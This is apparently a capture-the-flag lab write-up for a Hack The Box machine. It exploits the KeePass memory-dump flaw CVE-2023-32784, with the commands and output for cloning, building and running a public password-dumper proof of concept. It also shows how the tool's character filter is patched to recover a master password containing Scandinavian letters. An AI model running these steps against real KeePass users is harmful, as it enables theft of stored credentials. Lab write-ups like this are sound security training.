CVE-2023-32784
A vulnerability was found in KeePass. It has been classified as problematic. Affected is an unknown function in the library pagefile.sys of the component API. The manipulation with an unknown input leads to a missing encryption vulnerability. CWE is classifying the issue as CWE-311: the software does not encrypt sensitive or critical information before storage or transmission. This is going to have an impact on confidentiality.
The target instance of KeePass might be vulnerable, as it showed version 2.x when I checked the DB file.
Exploit
I found a PoC online
Exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ git clone https://github.com/vdohney/keepass-password-dumper.git ; cd keepass-password-dumper
Cloning into 'keepass-password-dumper'...
remote: Enumerating objects: 107, done.
remote: Counting objects: 100% (107/107), done.
remote: Compressing objects: 100% (75/75), done.
remote: Total 107 (delta 59), reused 68 (delta 28), pack-reused 0
receiving objects: 100% (107/107), 198.73 KiB | 3.61 MiB/s, done.
resolving deltas: 100% (59/59), done.
Downloading the exploit PoC to Kali
┌──(kali㉿kali)-[~/…/htb/labs/keeper/keepass-password-dumper]
└─$ dotnet publish -c Release -r linux-x64
MSBuild version 17.3.0+92e077650 for .NET
Determining projects to restore...
/usr/share/dotnet/sdk/6.0.400/sdks/microsoft.net.sdk/targets/microsoft.net.targetframeworkinference.targets(144,5): error NETSDK1045: The current .NET SDK does not support targeting .NET 7.0. Either target .NET 6.0 or lower, or use a version of the .NET SDK that supports .NET 7.0. [/home/kali/archive/htb/labs/keeper/keepass-password-dumper/keepass_password_dumper.csproj]
The initial cross-compilation attempt fails because I don't have the SDK for .NET 7.0.
That's okay. I can just resort to .NET 6.0.
Changing the target framework to .NET 6.0 in the keepass_password_dumper.csproj file
┌──(kali㉿kali)-[~/…/htb/labs/keeper/keepass-password-dumper]
└─$ dotnet publish -c Release -r linux-x64
MSBuild version 17.3.0+92e077650 for .NET
Determining projects to restore...
Restored /home/kali/archive/htb/labs/keeper/keepass-password-dumper/keepass_password_dumper.csproj (in 115 ms).
/usr/share/dotnet/sdk/6.0.400/sdks/microsoft.net.sdk/targets/microsoft.net.sdk.targets(1114,5): warning NETSDK1179: One of '--self-contained' or '--no-self-contained' options are required when '--runtime' is used. [/home/kali/archive/htb/labs/keeper/keepass-password-dumper/keepass_password_dumper.csproj]
keepass_password_dumper -> /home/kali/archive/htb/labs/keeper/keepass-password-dumper/bin/Release/net6.0/linux-x64/keepass_password_dumper.dll
keepass_password_dumper -> /home/kali/archive/htb/labs/keeper/keepass-password-dumper/bin/Release/net6.0/linux-x64/publish/
Compiled successfully. dotnet issues a warning that I didn't pass --self-contained or --no-self-contained alongside --runtime, but that won't be an issue.
Scandinavian Characters
┌──(kali㉿kali)-[~/…/htb/labs/keeper/keepass-password-dumper]
└─$ bin/Release/net6.0/linux-x64/publish/keepass_password_dumper ../KeePassDumpFull.dmp
Found: ●●d
Found: ●●d
Found: ●●d
Found: ●●d
Found: ●●d
Found: ●●d
Found: ●●d
Found: ●●d
Found: ●●d
Found: ●●d
Found: ●●●g
Found: ●●●g
Found: ●●●g
Found: ●●●g
Found: ●●●g
Found: ●●●g
Found: ●●●g
Found: ●●●g
Found: ●●●g
Found: ●●●g
Found: ●●●●r
Found: ●●●●r
Found: ●●●●r
Found: ●●●●r
Found: ●●●●r
Found: ●●●●r
Found: ●●●●r
Found: ●●●●r
Found: ●●●●r
Found: ●●●●r
Found: ●●●●●●d
Found: ●●●●●●d
Found: ●●●●●●d
Found: ●●●●●●d
Found: ●●●●●●d
Found: ●●●●●●d
Found: ●●●●●●d
Found: ●●●●●●d
Found: ●●●●●●d
Found: ●●●●●●d
Found: ●●●●●●●
Found: ●●●●●●●
Found: ●●●●●●●
Found: ●●●●●●●
Found: ●●●●●●●
Found: ●●●●●●●
Found: ●●●●●●●
Found: ●●●●●●●
Found: ●●●●●●●
Found: ●●●●●●●
Found: ●●●●●●●●m
Found: ●●●●●●●●m
Found: ●●●●●●●●m
Found: ●●●●●●●●m
Found: ●●●●●●●●m
Found: ●●●●●●●●m
Found: ●●●●●●●●m
Found: ●●●●●●●●m
Found: ●●●●●●●●m
Found: ●●●●●●●●m
Found: ●●●●●●●●●e
Found: ●●●●●●●●●e
Found: ●●●●●●●●●e
Found: ●●●●●●●●●e
Found: ●●●●●●●●●e
Found: ●●●●●●●●●e
Found: ●●●●●●●●●e
Found: ●●●●●●●●●e
Found: ●●●●●●●●●e
Found: ●●●●●●●●●e
Found: ●●●●●●●●●●d
Found: ●●●●●●●●●●d
Found: ●●●●●●●●●●d
Found: ●●●●●●●●●●d
Found: ●●●●●●●●●●d
Found: ●●●●●●●●●●d
Found: ●●●●●●●●●●d
Found: ●●●●●●●●●●d
Found: ●●●●●●●●●●d
Found: ●●●●●●●●●●d
Found: ●●●●●●●●●●●
Found: ●●●●●●●●●●●
Found: ●●●●●●●●●●●
Found: ●●●●●●●●●●●
Found: ●●●●●●●●●●●
Found: ●●●●●●●●●●●
Found: ●●●●●●●●●●●
Found: ●●●●●●●●●●●
Found: ●●●●●●●●●●●
Found: ●●●●●●●●●●●
Found: ●●●●●●●●●●●●f
Found: ●●●●●●●●●●●●f
Found: ●●●●●●●●●●●●f
Found: ●●●●●●●●●●●●f
Found: ●●●●●●●●●●●●f
Found: ●●●●●●●●●●●●f
Found: ●●●●●●●●●●●●f
Found: ●●●●●●●●●●●●f
Found: ●●●●●●●●●●●●f
Found: ●●●●●●●●●●●●f
Found: ●●●●●●●●●●●●●l
Found: ●●●●●●●●●●●●●l
Found: ●●●●●●●●●●●●●l
Found: ●●●●●●●●●●●●●l
Found: ●●●●●●●●●●●●●l
Found: ●●●●●●●●●●●●●l
Found: ●●●●●●●●●●●●●l
Found: ●●●●●●●●●●●●●l
Found: ●●●●●●●●●●●●●l
Found: ●●●●●●●●●●●●●l
Found: ●●●●●●●●●●●●●●●d
Found: ●●●●●●●●●●●●●●●d
Found: ●●●●●●●●●●●●●●●d
Found: ●●●●●●●●●●●●●●●d
Found: ●●●●●●●●●●●●●●●d
Found: ●●●●●●●●●●●●●●●d
Found: ●●●●●●●●●●●●●●●d
Found: ●●●●●●●●●●●●●●●d
Found: ●●●●●●●●●●●●●●●d
Found: ●●●●●●●●●●●●●●●d
Found: ●●●●●●●●●●●●●●●●e
Found: ●●●●●●●●●●●●●●●●e
Found: ●●●●●●●●●●●●●●●●e
Found: ●●●●●●●●●●●●●●●●e
Found: ●●●●●●●●●●●●●●●●e
Found: ●●●●●●●●●●●●●●●●e
Found: ●●●●●●●●●●●●●●●●e
Found: ●●●●●●●●●●●●●●●●e
Found: ●●●●●●●●●●●●●●●●e
Found: ●●●●●●●●●●●●●●●●e
[...REDACTED...]
Password candidates (character positions):
Unknown characters are displayed as "●"
1.: ●
2.: ,, l, `, -, ', ], A, I, :, =, _, c, M,
3.: d,
4.: g,
5.: r,
6.: ●
7.: d,
8.: ,
9.: m,
10.: e,
11.: d,
12.: ,
13.: f,
14.: l,
15.: ●
16.: d,
17.: e,
Combined: ●{,, l, `, -, ', ], A, I, :, =, _, c, M}dgr●d med fl●de
While the exploit PoC executes and recovers most of the password from the KeePass crash dump, it missed the first character as well as several characters in the middle.
Looking back at it, the target organization appears to be located in Scandinavia, as the real name of the lnorgaard user, Lise Nørgaard, suggests.
Therefore, it is possible that the exploit PoC does not check for Scandinavian vowel characters such as ø, ö, or å.
Checking the source code of the exploit PoC indeed confirms my theory.
The range specified in the AllowedChars string, ^[\x20-\x7E]+$, represents the printable ASCII characters. In this range:
- \x20 corresponds to the space character
- \x7E corresponds to the tilde character
Any candidate character outside that range is discarded, which is exactly what happens to ø.
I can fix it up by commenting out the previous AllowedChars variable and appending a new one with ^[\x20-\x7E\u00C0-\u00FF]+$:
- \x20-\x7E is a hex range that includes the printable ASCII characters, as before
- \u00C0-\u00FF is a Unicode range that includes the Latin-1 Supplement letters, which cover many Scandinavian characters (æ, ø, å, ä, ö and their upper-case forms)
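To make the effect of that one-line change concrete, here is an added Python check (not code from the PoC or from this write-up) that runs both AllowedChars patterns over a few constructed sample strings plus the page's own recovered fragment, and enumerates which code points in the widened U+00C0..U+00FF block are not letters at all. The function names is_allowed, accepted and non_letters_in_range are my own.

```python
import re
import unicodedata

# Original AllowedChars pattern from the PoC: printable ASCII only.
ALLOWED_ORIGINAL = re.compile(r"^[\x20-\x7E]+$")
# Widened pattern used in the write-up: adds the Latin-1 Supplement block.
ALLOWED_WIDENED = re.compile(r"^[\x20-\x7E\u00C0-\u00FF]+$")


def is_allowed(candidate: str, pattern: "re.Pattern[str]" = ALLOWED_WIDENED) -> bool:
    """True if every character of the candidate falls inside the pattern's class."""
    return pattern.fullmatch(candidate) is not None


def accepted(candidates, pattern):
    """Return the subset of candidate strings that the pattern would keep."""
    return [c for c in candidates if is_allowed(c, pattern)]


def non_letters_in_range(lo: int = 0xC0, hi: int = 0xFF):
    """Code points in [lo, hi] whose Unicode category is not a letter.

    Caveat the write-up glosses over: \\u00C0-\\u00FF is a code-point block, not a
    letter class, so it also admits the symbols × (U+00D7) and ÷ (U+00F7).
    """
    return [chr(cp) for cp in range(lo, hi + 1)
            if not unicodedata.category(chr(cp)).startswith("L")]


# Constructed sample strings (hypothetical, except the page's own "dgrød med fløde").
SAMPLES = [
    "dgr",                # plain ASCII: accepted by both patterns
    "dgrød med fløde",    # fragment from the page: needs the Latin-1 block
    "smörgås",            # constructed: ö and å are Latin-1
    "Łódź",               # constructed: Ł (U+0141) and ź (U+017A) are outside Latin-1
    "tab\there",          # constructed: control character, rejected by both
]

if __name__ == "__main__":
    for name, pat in (("original", ALLOWED_ORIGINAL), ("widened", ALLOWED_WIDENED)):
        print(f"{name:8s} keeps: {accepted(SAMPLES, pat)}")
    print("non-letters admitted by the widened range:", non_letters_in_range())
```

Running it shows why the first run printed ● where ø belonged: the original pattern rejects "dgrød med fløde" outright, while the widened one accepts it. It also shows the limit of the fix: characters above U+00FF (Polish Ł, for instance) are still filtered out, and a regex that matches on letter properties (such as .NET's \p{L}) would be the more general choice if other alphabets mattered.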
Retry
┌──(kali㉿kali)-[~/…/htb/labs/keeper/keepass-password-dumper]
└─$ rm -rf bin ; dotnet publish -c Release -r linux-x64
MSBuild version 17.3.0+92e077650 for .NET
Determining projects to restore...
All projects are up-to-date for restore.
/usr/share/dotnet/sdk/6.0.400/sdks/microsoft.net.sdk/targets/microsoft.net.sdk.targets(1114,5): warning NETSDK1179: One of '--self-contained' or '--no-self-contained' options are required when '--runtime' is used. [/home/kali/archive/htb/labs/keeper/keepass-password-dumper/keepass_password_dumper.csproj]
keepass_password_dumper -> /home/kali/archive/htb/labs/keeper/keepass-password-dumper/bin/Release/net6.0/linux-x64/keepass_password_dumper.dll
keepass_password_dumper -> /home/kali/archive/htb/labs/keeper/keepass-password-dumper/bin/Release/net6.0/linux-x64/publish/
Re-compiling
┌──(kali㉿kali)-[~/…/htb/labs/keeper/keepass-password-dumper]
└─$ bin/Release/net6.0/linux-x64/publish/keepass_password_dumper ../KeePassDumpFull.dmp
found: ●ø
found: ●ø
found: ●ø
found: ●ø
found: ●ø
found: ●ø
found: ●ø
found: ●ø
found: ●ø
found: ●ø
found: ●●d
found: ●●d
found: ●●d
found: ●●d
found: ●●d
found: ●●d
found: ●●d
found: ●●d
found: ●●d
found: ●●d
found: ●●●g
found: ●●●g
found: ●●●g
found: ●●●g
found: ●●●g
found: ●●●g
found: ●●●g
found: ●●●g
found: ●●●g
found: ●●●g
found: ●●●●r
found: ●●●●r
found: ●●●●r
found: ●●●●r
found: ●●●●r
found: ●●●●r
found: ●●●●r
found: ●●●●r
found: ●●●●r
found: ●●●●r
found: ●●●●●ø
found: ●●●●●ø
found: ●●●●●ø
found: ●●●●●ø
found: ●●●●●ø
found: ●●●●●ø
found: ●●●●●ø
found: ●●●●●ø
found: ●●●●●ø
found: ●●●●●ø
found: ●●●●●●d
found: ●●●●●●d
found: ●●●●●●d
found: ●●●●●●d
found: ●●●●●●d
found: ●●●●●●d
found: ●●●●●●d
found: ●●●●●●d
found: ●●●●●●d
found: ●●●●●●d
found: ●●●●●●●
found: ●●●●●●●
found: ●●●●●●●
found: ●●●●●●●
found: ●●●●●●●
found: ●●●●●●●
found: ●●●●●●●
found: ●●●●●●●
found: ●●●●●●●
found: ●●●●●●●
found: ●●●●●●●●m
found: ●●●●●●●●m
found: ●●●●●●●●m
found: ●●●●●●●●m
found: ●●●●●●●●m
found: ●●●●●●●●m
found: ●●●●●●●●m
found: ●●●●●●●●m
found: ●●●●●●●●m
found: ●●●●●●●●m
found: ●●●●●●●●●e
found: ●●●●●●●●●e
found: ●●●●●●●●●e
found: ●●●●●●●●●e
found: ●●●●●●●●●e
found: ●●●●●●●●●e
found: ●●●●●●●●●e
found: ●●●●●●●●●e
found: ●●●●●●●●●e
found: ●●●●●●●●●e
found: ●●●●●●●●●●d
found: ●●●●●●●●●●d
found: ●●●●●●●●●●d
found: ●●●●●●●●●●d
found: ●●●●●●●●●●d
found: ●●●●●●●●●●d
found: ●●●●●●●●●●d
found: ●●●●●●●●●●d
found: ●●●●●●●●●●d
found: ●●●●●●●●●●d
found: ●●●●●●●●●●●
found: ●●●●●●●●●●●
found: ●●●●●●●●●●●
found: ●●●●●●●●●●●
found: ●●●●●●●●●●●
found: ●●●●●●●●●●●
found: ●●●●●●●●●●●
found: ●●●●●●●●●●●
found: ●●●●●●●●●●●
found: ●●●●●●●●●●●
found: ●●●●●●●●●●●●f
found: ●●●●●●●●●●●●f
found: ●●●●●●●●●●●●f
found: ●●●●●●●●●●●●f
found: ●●●●●●●●●●●●f
found: ●●●●●●●●●●●●f
found: ●●●●●●●●●●●●f
found: ●●●●●●●●●●●●f
found: ●●●●●●●●●●●●f
found: ●●●●●●●●●●●●f
found: ●●●●●●●●●●●●●l
found: ●●●●●●●●●●●●●l
found: ●●●●●●●●●●●●●l
found: ●●●●●●●●●●●●●l
found: ●●●●●●●●●●●●●l
found: ●●●●●●●●●●●●●l
found: ●●●●●●●●●●●●●l
found: ●●●●●●●●●●●●●l
found: ●●●●●●●●●●●●●l
found: ●●●●●●●●●●●●●l
found: ●●●●●●●●●●●●●●ø
found: ●●●●●●●●●●●●●●ø
found: ●●●●●●●●●●●●●●ø
found: ●●●●●●●●●●●●●●ø
found: ●●●●●●●●●●●●●●ø
found: ●●●●●●●●●●●●●●ø
found: ●●●●●●●●●●●●●●ø
found: ●●●●●●●●●●●●●●ø
found: ●●●●●●●●●●●●●●ø
found: ●●●●●●●●●●●●●●ø
found: ●●●●●●●●●●●●●●●d
found: ●●●●●●●●●●●●●●●d
found: ●●●●●●●●●●●●●●●d
found: ●●●●●●●●●●●●●●●d
found: ●●●●●●●●●●●●●●●d
found: ●●●●●●●●●●●●●●●d
found: ●●●●●●●●●●●●●●●d
found: ●●●●●●●●●●●●●●●d
found: ●●●●●●●●●●●●●●●d
found: ●●●●●●●●●●●●●●●d
found: ●●●●●●●●●●●●●●●●e
found: ●●●●●●●●●●●●●●●●e
found: ●●●●●●●●●●●●●●●●e
found: ●●●●●●●●●●●●●●●●e
found: ●●●●●●●●●●●●●●●●e
found: ●●●●●●●●●●●●●●●●e
found: ●●●●●●●●●●●●●●●●e
found: ●●●●●●●●●●●●●●●●e
found: ●●●●●●●●●●●●●●●●e
found: ●●●●●●●●●●●●●●●●e
[...REDACTED...]
password candidates (character positions):
Unknown characters are displayed as "●"
1.: ●
2.: ø, Ï, ,, l, `, -, ', ], A, I, :, =, _, c, M,
3.: d,
4.: g,
5.: r,
6.: ø,
7.: d,
8.: ,
9.: m,
10.: e,
11.: d,
12.: ,
13.: f,
14.: l,
15.: ø,
16.: d,
17.: e,
combined: ●{ø, Ï, ,, l, `, -, ', ], A, I, :, =, _, c, M}dgrød med fløde
It indeed works! The exploit PoC prints the Scandinavian vowel characters this time. However, the issue still persists:
- the first character is unknown, indicated by ●
- the second character is unknown, since the output lists {ø, Ï, ,, l, `, -, ', ], A, I, :, =, _, c, M} and it could be any one of those
- the rest is dgrød med fløde, which appears to be a phrase
There is a mention of the first password character being missed in the README.md file within the exploit PoC.
Solution found. I will continue in the Privilege Escalation phase.